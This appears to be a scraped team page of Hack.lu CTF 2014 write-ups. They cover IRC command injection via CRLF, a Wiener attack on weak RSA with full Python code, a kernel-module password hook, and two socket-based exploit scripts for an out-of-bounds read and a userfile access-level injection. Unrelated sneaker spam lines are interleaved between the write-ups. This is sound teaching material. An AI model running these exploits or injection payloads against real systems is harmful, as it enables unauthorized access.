BalalaikaCr3w - Hack.lu CTF Quals 2014

Barmixer Bot (misc 200)

azrael — Sun, 26 Oct 2014 18:25:44 +0000

Category:

Event:

Hack.lu CTF Quals 2014

Task

There's a fun and quirky IRC bot to play with. It responds to commands in private chat but also in #hacklu-saloon on freenode. We think it's involved in a devious scheme that distracts people to get their money pickpocketed. So be careful!

Solution

We deal with IRC-bot named barmixer-bot in this task. It can understand some commands that starts with "!" symbol.

Let our username is "hacker". First let's ask bot for help:

hacker: !help
barmixer-bot: Send messages to the bot or the channel starting with an exclamation mark. Known commands are list, status, karma, math, base64, base64d, rot13, ping, hack, request, list

So what status is it?

hacker: !status
barmixer-bot: My name is barmixer-bot, my uptime is 1 hours 55 minutes and 37 seconds. I am on the following channels: #hacklu-saloon, #hacklu-secret-channel, ...

It looks like bot is member of #hacklu-secret-channel which most likely contain a flag. But this channel require an invitation to get access.

Other commands are not very interesting. Some of them bot performs an actions such as base64 decoding / enciding, rot13. Example:

hacker: !base64 hello 
barmixer-bot: aGVsbG8=

hacker: !base64d aGVsbG8= 
barmixer-bot: hello

We know about IRC-commands and specifically about INVITE command. Maybe we can force bot to invite us to secret channel?

Delimeter between IRC-commands is newline so let's generate our shell:

>>> import base64
>>> c = '1\r\nINVITE hacker #hacklu-secret-channel'
>>> print base64.b64encode(c)
MQ0KSU5WSVRFIGhhY2tlciAjaGFja2x1LXNlY3JldC1jaGFubmVs

And let bot decode it for us:

hacker: !base64d MQ0KSU5WSVRFIGhhY2tlciAjaGFja2x1LXNlY3JldC1jaGFubmVs

Now go to #hacklu-secret-channel and voila! We are inside! Channel topic was "FLAG: GfeBNmN5XjwDvQB64qoqaEEeYogk4rGH3ikZ0qtc3B3HKLDoAH".

latest Nike Sneakers | Best Nike Air Max Shoes 2021 , Air Max Releases and Deals

Wiener (Crypto 300)

Mirron — Sun, 26 Oct 2014 17:18:25 +0000

Category:

crypto

Event:

Hack.lu CTF Quals 2014

Task

It's gold rush time! The New York Herald just reported about the Californian gold rush. We know a sheriff there is hiring guys to help him fill his own pockets. We know he already has a deadful amount of gold in his secret vault. However, it is protected by a secret only he knows.
When new deputies apply for the job, they get their own secret, but that only provies entry to a vault of all deputy sheriffs. No idiot would store their stuff in this vault.
But maybe we can find a way to gain access to the sheriff's vault? Have a go at it:

nc wildwildweb.fluxfingers.net 1426
You might also need this [see attachment].

Solution

When connects to wildwildweb.fluxfingers.net:1426 one gets acquainted with command interface to acquire credentials (login name, ssh private key, ssh public key) for the address wildwildweb.fluxfingers.net:1427 and to view public keys of other persons having access to that address. The main purpose of the task is to login with credentials corresponding to sheriff.

Taking a look at service source code provided one can notice, that RSA keys are generated in a bit unusual way:

def create_parameters(size=2048):
    p = get_prime(size // 2)
    q = get_prime(size // 2)
    N = p * q
    phi_N = (p - 1) * (q - 1)
    while True:
        d = prng.getrandbits(size // 5)
        e = int(gmpy.invert(d, phi_N))
        if (e * d) % phi_N == 1:
            break

    assert test_key(N, e, d)
    return N, e, d, p, q

Instead of generating modulus N, picking standard public exponent e and calculating private exponent as (e^(-1)) mod phi(N), they pick rather small random private exponent d and find corresponding e. The d picked is proportional to N^0.2.

With the key generation set up this way RSA cryptosytem becomes weak to Wiener's attack (see http://en.wikipedia.org/wiki/Wiener%27s_attack). As anyone can see, Wiener's attack is applicable with d < (N^0.25)/3, so that's our case. To perform the attack we are to be able to make continued fractions from ordinary ones, calculate convergents of fractions and solve quadratic equations in rational field. A quick glance at Sage package hasn't given an impression to help us in this: its method "continued_fraction" seems to be working, but we don't want to make division before finding continued fraction values not to loose preciseness. Therefore let's write some code ourselves.

First, method to make continued fraction -- it's tested to give the same result as "continued_fraction" method of sage does:

def makeNextFraction(fraction):
    (a,b) = fraction
    res=b/a
    a1=b%a
    b1=a
    return res, (a1,b1)

def makeContinuedFraction(fraction):
    (a,b) = fraction
    v=[]
    v.append(0)
    while not a == 1:
        r, fraction = makeNextFraction(fraction)
        (a,b) = fraction
        v.append(r)
    v.append(b)
    return v

Next, method for finding convergents -- the same as sage's "continued_fraction(e).convergents()":

def makeIndexedConvergent(sequence, index):
    (a,b)=(1,sequence[index])
    while index>0:
        index-=1
        (a,b)=(b,sequence[index]*b+a)
    return (b,a)

def makeConvergents(sequence):
    r=[]
    for i in xrange(0,len(sequence)):
        r.append(makeIndexedConvergent(sequence,i))
    return r

To solve quadratic equations we will use sympy package:

from sympy.solvers import solve
from sympy import Symbol

def solveQuadratic(a,b,c):
    x = Symbol('x')
    return solve(a*x**2 + b*x + c, x)

To try different convergents let's use this code:

def wienerAttack(N,e):
    conv=makeConvergents(makeContinuedFraction((e,N)))
    for frac in conv:
        (k,d)=frac
        if k == 0:
            continue
        phiN=((e*d)-1)/k
        roots=solveQuadratic(1, -(N-phiN+1), N)
        if len(roots) == 2:
            p,q=roots[0]%N,roots[1]%N
            if(p*q==N):
            	return p, q

Now we can stick this all together and save as wienner_attack.py [see attached].

The reminder we do manually.

Save sheriff's ssh-rsa public key to sheriff.pub.

Convert ssh-rsa to pem with ssh-keygen:

$ ssh-keygen -f sheriff.pub -e -m pem > sheriffpub.pem

Get e and N from PEM using openssl:

$ openssl asn1parse -in sheriffpub.pem -i
    0:d=0  hl=4 l= 520 cons: SEQUENCE          
    4:d=1  hl=4 l= 256 prim:  INTEGER           :02AEB637F6152AFD4FB3A2DD165AEC9D5B45E70D2B82E78A353F7A1751859D196F56CB6D11700195F1069A73D9E5710950B814229AB4C5549383C2C87E0CD97F904748A1302400DC76B42591DA17DABAF946AAAF1640F1327AF16BE45B8830603947A9C3309CA4D6CC9F1A2BCFDACF285FBC2F730E515AE1D93591CCD98F5C4674EC4A5859264700F700A4F4DCF7C3C35BBC579F6EBF80DA33C6C11F68655092BBE670D5225B8E571D596FE426DB59A6A05AAF77B3917448B2CFBCB3BD647B46772B13133FC68FFABCB3752372B949A3704B8596DF4A44F085393EE2BF80F8F393719ED94AB348852F6A5E0C493EFA32DA5BF601063A033BEAF73BA47D8205DB
  264:d=1  hl=4 l= 256 prim:  INTEGER           :0285F8D4FE29CE11605EDF221868937C1B70AE376E34D67F9BB78C29A2D79CA46A60EA02A70FDB40E805B5D854255968B2B1F043963DCD61714CE4FC5C70ECC4D756AD1685D661DB39D15A801D1C382ED97A048F0F85D909C811691D3FFE262EB70CCD1FA7DBA1AA79139F21C14B3DFE95340491CFF3A5A6AE9604329578DB9F5BCC192E16AA62F687A8038E60C01518F8CCAA0BEFE569DADAE8E49310A7A3C3BDDCF637FC82E5340BEF4105B533B6A531895650B2EFA337D94C7A76447767B5129A04BCF3CD95BB60F6BFD1A12658530124AD8C6FD71652B8E0EB482FCC475043B410DFC4FE5FBC6BDA08CA61244284A4AB5B311BC669DF0C753526A79C1A57

Restore factorization of N using Wiener's attack:

$ python wiener_attack.py -e 0x0285F8D4FE29CE11605EDF221868937C1B70AE376E34D67F9BB78C29A2D79CA46A60EA02A70FDB40E805B5D854255968B2B1F043963DCD61714CE4FC5C70ECC4D756AD1685D661DB39D15A801D1C382ED97A048F0F85D909C811691D3FFE262EB70CCD1FA7DBA1AA79139F21C14B3DFE95340491CFF3A5A6AE9604329578DB9F5BCC192E16AA62F687A8038E60C01518F8CCAA0BEFE569DADAE8E49310A7A3C3BDDCF637FC82E5340BEF4105B533B6A531895650B2EFA337D94C7A76447767B5129A04BCF3CD95BB60F6BFD1A12658530124AD8C6FD71652B8E0EB482FCC475043B410DFC4FE5FBC6BDA08CA61244284A4AB5B311BC669DF0C753526A79C1A57 -n 0x02AEB637F6152AFD4FB3A2DD165AEC9D5B45E70D2B82E78A353F7A1751859D196F56CB6D11700195F1069A73D9E5710950B814229AB4C5549383C2C87E0CD97F904748A1302400DC76B42591DA17DABAF946AAAF1640F1327AF16BE45B8830603947A9C3309CA4D6CC9F1A2BCFDACF285FBC2F730E515AE1D93591CCD98F5C4674EC4A5859264700F700A4F4DCF7C3C35BBC579F6EBF80DA33C6C11F68655092BBE670D5225B8E571D596FE426DB59A6A05AAF77B3917448B2CFBCB3BD647B46772B13133FC68FFABCB3752372B949A3704B8596DF4A44F085393EE2BF80F8F393719ED94AB348852F6A5E0C493EFA32DA5BF601063A033BEAF73BA47D8205DB
-p 12001304129015480165432875074437607933493850611499879464845243350215176144760883615322622081442653872645865326992384034722586201972392183010813439352778246403016897976571514715418700569567613729681273931557848857971070286176848136118602099586101089743239644367344468295964691411425416652519752140536869089101
-q 28216117316929874067495888027767527011360661622486842768414059951572932145196930641365509243766454218518793508840136548374994021850853203018205749779390383366761851772055038753940967432004901699256177783249460134792699230632136386268348434203012426963129659057781488950062703849444443906614331812260961682887
-e 318540665379393469901456665807211509077755719995811520039095212139429238053864597311950397094944291616119321660193803737677538864969915331331528398734504661147661499115125056479426948683504604460936703005724827506058051215012025774714463561829608252938657297504427643593752676857551877096958959488289759878259498255905255543409142370769036479607835226542428818361327569095305960454592450213005148130508649794732855515489990191085723757628463901282599712670814223322126866814011761400443596552984309315434653984387419451894484613987942298157348306834118923950284809853541881602043240244910348705406353947587203832407

Use rsatool.py (https://github.com/ius/rsatool/blob/master/rsatool.py) to generate sheriff's private key:

$ python rsatool.py -o sheriffpriv.pem -p 12001304129015480165432875074437607933493850611499879464845243350215176144760883615322622081442653872645865326992384034722586201972392183010813439352778246403016897976571514715418700569567613729681273931557848857971070286176848136118602099586101089743239644367344468295964691411425416652519752140536869089101 -q 28216117316929874067495888027767527011360661622486842768414059951572932145196930641365509243766454218518793508840136548374994021850853203018205749779390383366761851772055038753940967432004901699256177783249460134792699230632136386268348434203012426963129659057781488950062703849444443906614331812260961682887 -e 318540665379393469901456665807211509077755719995811520039095212139429238053864597311950397094944291616119321660193803737677538864969915331331528398734504661147661499115125056479426948683504604460936703005724827506058051215012025774714463561829608252938657297504427643593752676857551877096958959488289759878259498255905255543409142370769036479607835226542428818361327569095305960454592450213005148130508649794732855515489990191085723757628463901282599712670814223322126866814011761400443596552984309315434653984387419451894484613987942298157348306834118923950284809853541881602043240244910348705406353947587203832407 &>0

$ chmod 0600 sheriffpriv.pem
$ ssh sheriff@wildwildweb.fluxfingers.net -p 1427 -i sheriffpriv.pem
Woah look how much gold that old croaker has: flag{TONS_OF_GOLD_SUCH_WOW_MUCH_GLOW}

Best jordan Sneakers | Nike Air Jordan XXX Basketball Shoes/Sneakers 811006-101 Worldarchitecturefestival

Attachments:

wiener_38ff175d336b9c75fbf1b77290978015.py_.zip

wiener_attack.py_.zip

Gunslinger Joe's Gold (Reversing - 200)

Triff — Fri, 24 Oct 2014 08:00:25 +0000

Category:

reverse

Event:

Hack.lu CTF Quals 2014

Task:

Silly Gunslinger Joe has learned from his mistakes with his private terminal and now tries to remember passwords. But he's gotten more paranoid and chose to develope an additional method: protect all his private stuff with a secure locking mechanism that no one would be able to figure out! He's so confident with this new method that he even started using it to protect all his precious gold. So … we better steal all of it!

SSH: joes_gold@wildwildweb.fluxfingers.net
PORT: 1415
PASSWORD: 1gs67uendsx71xmma8

Solution:

Start with ssh connection to the given server (whatever). In the home directory I found two files: FLAG and gold_stash.

joes_gold@goldstash:~$ ls -la
total 32
drwxr-xr-x 2 joes_gold joes_gold  4096 Oct  6 23:09 .
drwxr-xr-x 3 root      root       4096 Oct  6 22:56 ..
-rw-r--r-- 1 joes_gold joes_gold  3106 Feb 20  2014 .bashrc
-r-------- 1 gold      gold         46 Oct  6 23:04 FLAG
-rwsr-sr-x 1 gold      gold      13186 Oct  6 23:03 gold_stash

So I didn't have enough rights to read FLAG but I sill could run gold_stash and found the way how it can read FLAG for me. I ran gold_stash and it asked me for username and password to authenticate.

joes_gold@goldstash:~$ ./gold_stash
          (_/-------------_______________________)
          `|  /~~~~~~~~~~\                       |
           ;  |--------(-||______________________|
           ;  |--------(-| ____________|
           ;  \__________/'
         _/__         ___;
      ,~~    |  __--~~       Gunslinger Joe's
     '        ~~| (  |       Private Stash of Gold
    '      '~~  `____'
   '      '
  '      `            Password Protection activated!
 '       `
'--------`
Username:
Password:
Authentication failed!

I copied it to my desktop and 'strings' gave me: Joe and omg_joe_is_so_rich were found. Back to server.. enter username and password.. fail.. O_o. Ok, then I tried to check password locally.. and it was correct!

It seems to be time to RE.. but:

nothing new...

Ok, back again to server: I copied gold_stash to /tmp and start it.. password was ok, but suid bit was not copied and I was not able to read FLAG. So, something wreck my input or smth else.. I did 'lsmod' and found one strange module 'joe.ko'.

Then I've started RE it. In short this driver hooks sys_read and modify result of sys_read (name it as usInput) if it matches some conditions. The conditions are:

if (some current_task parameter doesn't match smth) don't change anything;
if (usInput == "omg_joe_is_so_rich") set usInput to encrypt(usInput);
if (encrypt(usInput) == "omg_joe_is_so_rich") set usInput to "omg_joe_is_so_rich".

So I should have found such st that match encrypt(st) == "omg_joe_is_so_rich". Encrypt function code is quite simple:

and valid password can be recieved by the following code:

>>> k0 = '123456789012445678'
>>> k1 = 'omg_joe_is_so_rich'
>>> ''.join([chr((ord(k0[i])^ord(k1[i]))+4) for i in range(len(k0))])
'bcXoc]VkTGrE_oKcXT'

and now...

joes_gold@goldstash:~$ ./gold_stash
          (_/-------------_______________________)
          `|  /~~~~~~~~~~\                       |
           ;  |--------(-||______________________|
           ;  |--------(-| ____________|
           ;  \__________/'
         _/__         ___;
      ,~~    |  __--~~       Gunslinger Joe's
     '        ~~| (  |       Private Stash of Gold
    '      '~~  `____'
   '      '
  '      `            Password Protection activated!
 '       `
'--------`
Username: Joe
Password: bcXoc]VkTGrE_oKcXT
Access granted!
$ cat FLAG
flag{joe_thought_youd_never_find_that_module}

The flag is: flag{joe_thought_youd_never_find_that_module}

Adidas shoes | Women's Designer Sneakers - Luxury Shopping

Attachments:

joe.ko_.zip

gold_stash.zip

Guess the Flag (Exploit - 200)

Dil4rd — Thu, 23 Oct 2014 14:46:42 +0000

Category:

pwn

Event:

Hack.lu CTF Quals 2014

Description:

Look at that guy over there! He's a bandit from the group that robs the stagecoaches in unpredictable intervals. I think he hasn't been with them for very long, so he can't tell whether you're one of them. Try to look like a bandit and talk to him. He probably won't just tell you their plan for the attack, but maybe you can ask him some questions?

Download
nc wildwildweb.fluxfingers.net 1412

Solution:

So we have source code and binary. One look is enough to notice a strange thing in function is_flag_correct: obviously constant global varibales bin_by_hex and flag defined localy! Now we can concentrate in searching vuln and find it in function is_flag_correct:

    char value1 = bin_by_hex[flag_hex[i*2  ]];
    char value2 = bin_by_hex[flag_hex[i*2+1]];

where flag_hex is a user controlled array on signed bytes! So we can access memory out of array bin_by_hex.

In binary we see that we can access flag variable in stack:

So exploitation idea is to send flag of next type:

sendFlag = known_flag_part + "%02x"%(brute_byte)
sendFlag += ''.join([hex_by_pass_el_index(i) for i in range(len(sendFlag),50)])

where hex_by_pass_el_index(i) gives two bytes that cause program to fetch i-th element of original flag. And we get success message when brute_byte is valid and fail message otherwise.

Here is the full exploit code:

import string
import socket
ERR_SUCCESS = 0
ERR_CONNECT = -1
ERR_INVALID_FLAG = -2

host = 'wildwildweb.fluxfingers.net'
port = 1412
def hex_by_pass_el_index(i):
	return '0'+chr(0xC0+i)
def build_hex_pass_guesser(p):
	r = ''
	for i in range(len(p)):
		if p[i]!=None:
			r += "%02x"%(ord(p[i]))
		else:
			r += hex_by_pass_el_index(i)
	return r

def is_valid(s,p):
	buf = s.recv(10000)
	if 'guess' not in buf:
		return ERR_CONNECT
	s.send(p+'\n')
	buf = s.recv(10000)
	if 'Nope' not in buf:
		return ERR_SUCCESS
	else:
		return ERR_INVALID_FLAG

def brute(alph = string.printable):
	s = None
	p = [None]*50
	for k in range(5,len(p)-1):
		i=0
		while True:
			if s==None:
				s = socket.create_connection((host,port))
				s.settimeout(5)
				s.recv(50000)
			p[k] = alph[i]
			my_hex_pass = build_hex_pass_guesser(p)
			bVal = is_valid(s,my_hex_pass)
			#print(k,i,p,bVal)
			if bVal==ERR_SUCCESS:
				break
			if bVal==ERR_CONNECT:
				s.close()
				s=None
			if bVal==ERR_INVALID_FLAG:
				i += 1
		print(p)
	return p

print(''.join(brute()))

And the flag is: flag{6974736a7573746c696b65696e7468656d6f76696573}

Authentic Sneakers | Men’s shoes

Personnel Database (Exploit - 150)

Triff — Thu, 23 Oct 2014 12:24:46 +0000

Category:

pwn

Event:

Hack.lu CTF Quals 2014

Task:

Lots of criminals in this area work for one big boss, but we have been unable to determine who he is. We know that their organization has one central personnel database that might also contain information about their boss, whose username is simply “boss”. However, when you register in their system, you only get access level zero, which is not enough for reading data about the boss - that guy is level 10. Do you think you can get around their protections?

nc wildwildweb.fluxfingers.net 1410

Note: The users dir will be wiped every 5 minutes

And a .c file attached (attached to write-up below)

Solution:

It's very simple challenge, so i wouldn't explain how server works. You can figure it out by yourself if you take a closer look at provided source file.

What should we do? We have to find out who is the boss. In this system each user has decription, so we have to read boss'es description. But we can only read description of users with level lesser then ours and we have level 0, and boss has level 10, so we have to promoted our user to level 11 or more and read boss till the end=) let's pwn:

Vulnarable parts:

struct userdata *read_userfile(char *user) {
  struct userdata *res = calloc(1, sizeof(*res));
  if (res == NULL) return NULL;
  int fd = open_userfile(user, O_RDONLY);
  if (fd == -1) return NULL;
  FILE *f = fdopen(fd, "r");
  if (f == NULL) { close(fd); return NULL; }
  char line[256];
  while (fgets(line, sizeof(line), f)) {
    rtrim(line);
    char *key = line;
    char *eqsign = strchr(line, '=');
    if (!eqsign) continue;
    *eqsign = '\0';
    char *value = eqsign+1;

    if (!strcmp(key, "hash")) res->hash = atoll(value);
    else if (!strcmp(key, "access_level")) res->access_level = atoi(value);
    else if (!strcmp(key, "description")) strcpy(res->description, value);
    else printf("fatal error: bad key \"%s\" in config, aborting\n", key), exit(1);
  }
  return res;
}

and:

struct userdata {
  uint32_t hash;
  unsigned int access_level;
  char description[512];
};

.....

  char username[21] = "";
  struct userdata *ud = NULL;
  bool logged_in = false;

  char line[512]; /* last incoming command */
  while (printf("> "), fgets(line, sizeof(line), stdin)) {
    rtrim(line);
    char *cmd = line;
    char *params = strchr(line, ' ');
    if (params) {
      *params = '\0';
      params++;
    }

.....

if (!strcmp(cmd, "set_description")) {
      if (!logged_in) { printf("you must be logged in for this\n"); continue; }
      if (!params) { printf("missing description\n"); continue; }
      strcpy(ud->description, params);
      printf("description set\n");
    }

When you perform 'logout' command, your userfile will be written on disk and on login it will be read again. You can notice, that description field has 512 bytes length, command that you can perfom has same 512-bytes length, but system reads userfile by 256-bytes in cycle. So we can overflow decription and in will be splitted in two fields in userfile, cos no checksum used we can rewrite access_level (description is read after access level), including "access_level=11" in description.

So just register, set description, logout, login and pwn boss! (it become even more easy, cos server will notify you if he meets wrong field in userfile, so he helps you to make injection in it).

Exploit:

import socket
from time import sleep

s = socket.socket()
s.connect(('wildwildweb.fluxfingers.net', 1410))

username = 'balalaika2'
password = 'skjdgfksgi'

print s.recv(1024)
s.send("register " + username + ':' + password + '\n')
sleep(0.5)

print s.recv(1024)
s.send("set_description aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaccess_level=11\n")
sleep(0.5)

print s.recv(1024)
s.send("logout\n")
sleep(0.5)

print s.recv(1024)
s.send("user "+ username+ "\n")
sleep(0.5)

print s.recv(1024)
s.send("pass " + password + "\n")
sleep(0.5)

print s.recv(1024)
s.send("whois boss\n")
sleep(0.5)

print s.recv(1024)

This script produces following output:

user created successfully

description set

Uh, who are you again? I have forgotten.

username accepted, please provide password

login ok

user	boss
level	10
descr	"flag{this_is_why_gets_is_better_than_fgets}"

And the flag is flag{this_is_why_gets_is_better_than_fgets}

spy offers | Jordan

Attachments:

personnel_database_server.zip

solver.py_.zip